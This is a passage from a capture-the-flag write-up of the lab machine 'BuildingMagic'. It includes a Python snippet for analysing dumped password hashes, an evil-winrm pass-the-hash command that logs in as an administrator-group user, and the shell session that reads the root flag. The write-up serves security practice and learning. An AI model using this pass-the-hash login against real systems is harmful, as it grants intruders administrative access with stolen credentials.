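    entries = parse_dump(text)
    by_nt = {}
    for e in entries:
        by_nt.setdefault(e["nt"], []).append(e["user"])
    return {
        "shared_nt_hash": {nt: users for nt, users in by_nt.items()
                           if len(users) > 1 and nt != EMPTY_NT},
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_hash_present": [e["user"] for e in entries if e["lm"] != NO_LM],
    }
```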

This works for the user a.flatch, who is in the Administrators group, so I can WinRM as this user and obtain the root flag:

root@kali:~/hacksmarter/BuildingMagic/enumeration ➜  evil-winrm -i dc01.buildingmagic.local -u a.flatch -H 520126a03f5d5a8d836f1c4f34ede7ce

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\a.flatch\Documents> cd ..\..\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/12/2025 1:37 PM nssm-2.24
-a---- 9/2/2025 4:24 PM 32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
9557e65<snip>

Thoughts

This was a great machine and I liked the leaked database file part. I was a bit stuck at the end because I was going off of the users list obtained from the leaked database file, and I had forgotten to dump a new one with every AD user. I’d give this machine a solid 8/10.